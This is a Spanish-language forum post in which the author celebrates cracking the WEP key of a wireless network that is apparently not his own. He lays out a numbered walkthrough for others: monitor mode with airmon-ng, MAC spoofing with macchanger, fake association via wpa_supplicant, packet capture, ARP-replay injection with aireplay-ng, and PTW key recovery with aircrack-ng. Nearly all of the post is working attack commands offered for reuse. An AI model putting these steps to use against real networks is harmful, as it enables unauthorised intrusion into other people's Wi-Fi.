POR FIN !!!!!!!!!!! POR FIN HE LOGRADO INYECTAR !!!!!!!!!!
Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX.
Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:
Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar
aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto:
aircrack-ng -z *.cap asi me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.
En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:
-------------------------------------------------------------------------------------------------------------------------------
1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a Auditar, y copio en un .txt aparte toda la info.
2º
airmon-ng start wlan0 CHANNEL3º Creo el
wpa.confCódigo:
network={
ssid="ESSID"
key_mgmt=NONE
bssid=BSSID
wep_key0="232323343478787"
}
3º
ifconfig wlan0 down4º
macchanger -m 00:11:22:33:44:55 wlan05º
ifconfig wlan0 up6º
wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0 Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.
7º
airodump-ng -w dexter-back -c CHANNEL mon08º
aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon09º
aircrack-ng -z *.cap 10º
KEY FOUND!NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar, tan solo tengo que decir que a mi en Windows solo me aparece esta red con una sola rallita verde y muchas veces ni siquiera la pillo, sin embargo ya veis que he sacado la clave en pocos minutos.